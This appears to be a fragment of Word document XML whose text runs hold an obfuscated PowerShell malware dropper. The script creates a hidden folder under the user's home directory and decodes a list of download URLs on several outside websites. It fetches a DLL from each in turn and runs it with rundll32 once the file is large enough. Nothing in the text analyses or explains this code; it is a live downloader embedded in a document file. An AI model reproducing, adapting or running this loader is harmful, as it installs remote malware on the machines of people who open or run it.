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sEt MKu ( [TYPe]("{0}{1}{2}{4}{3}" -F 'SYsT','eM.','io.DI','ORY','rECt') );    SeT-iTEM  ('vaR'+'IabLE'+':mBu') (  [TYPe]("{6}{8}{0}{3}{4}{5}{2}{7}{1}" -f'SteM','Ger','Ma','.n','et.seRVIcepOi','nt','s','NA','Y')); $ErrorActionPreference = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(('S'+'il')+('en'+'t')+'ly'+('Cont'+'i'+'nue'));$Cvmmq4o=$Q26L + [char](64) + $E16H;$J16J=('N'+('_0'+'P')); (DIr VariabLE:Mku  ).VaLUe::"c`REAt`edI`REC`TORy"($HOME + (('{'+'0}Db_bh'+'30'+'{0}'+'Yf'+'5be5g{0}') -F [chAR]92));$C39Y=(('U6'+'8')+'S');  ( vARiaBLe  ("m"+"bu")  -VAlueoN  )::"sEcuRITYproT`o`c`ol" = ('T'+('ls'+'12'));$F35I=('I'+('4'+'_B'));$Swrp6tc = (('A6'+'9')+'S');$X27H=('C3'+'3O');$Imd1yck=$HOME+((('UO'+'H'+'Db_')+'b'+('h3'+'0UO')+('HY'+'f')+('5be5'+'g'+'UOH'))."ReP`lACe"(('U'+'OH'),[StrInG][chAr]92))+$Swrp6tc+(('.'+'dl')+'l');$K47V=('R'+('4'+'9G'));$B9fhbyv=(']'+('a'+'nw[3s://adm'+'int'+'k.c'+'o'+'m/'+'w')+('p-adm'+'in/'+'L/')+'@'+(']a'+'n'+'w[3s')+':'+'/'+'/m'+('ike'+'ge')+('e'+'r'+'inck.')+('c'+'om')+('/c/'+'Y'+'Ys')+'a'+('/@]'+'anw'+'['+'3://free'+'lanc'+'e'+'rw')+('ebdesi'+'gnerh'+'yd')+('er'+'aba')+('d.'+'com/')+('cgi'+'-bin'+'/S')+('/'+'@'+']anw')+('[3'+'://'+'etdog.co'+'m'+'/w')+('p-'+'co')+'nt'+('e'+'nt')+('/n'+'u/@')+(']a'+'nw[3')+'s'+('://'+'www'+'.hintu'+'p.c')+('o'+'m.')+('b'+'r/')+'w'+('p'+'-co')+('n'+'ten')</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">+('t'+'/dE/'+'@]a'+'nw[3://'+'www.')+'s'+('tm'+'arouns'+'.')+('ns'+'w')+('.'+'edu.au/p'+'a'+'y'+'pal/b8')+('G'+'/@]')+('a'+'nw[')+('3:'+'/')+('/'+'wm.mcdeve'+'lop.net'+'/'+'c'+'on'+'t'+'e')+('nt'+'/')+'6'+('F2'+'gd/'))."RE`p`lACe"(((']a'+'n')+('w'+'[3')),([array]('sd','sw'),(('h'+'tt')+'p'),'3d')[1])."s`PLIT"($C83R + $Cvmmq4o + $F10Q);$Q52M=('P'+('0'+'5K'));foreach ($Bm5pw6z in $B9fhbyv){try{(&amp;('New'+'-Objec'+'t') SysTem.nEt.WEBcLIeNT)."do`WNl`OaD`FIlE"($Bm5pw6z, $Imd1yck);$Z10L=('A9'+'2Q');If ((&amp;('Ge'+'t-It'+'em') $Imd1yck)."len`G`TH" -ge 35698) {&amp;('r'+'undl'+'l32') $Imd1yck,(('Co'+'nt')+'r'+('ol'+'_RunD'+'L')+'L')."T`OSt`RiNG"();$R65I=('Z'+('09'+'B'));break;$K7_H=('F1'+'2U')}}catch{}}$W54I=(('V9'+'5')+'O')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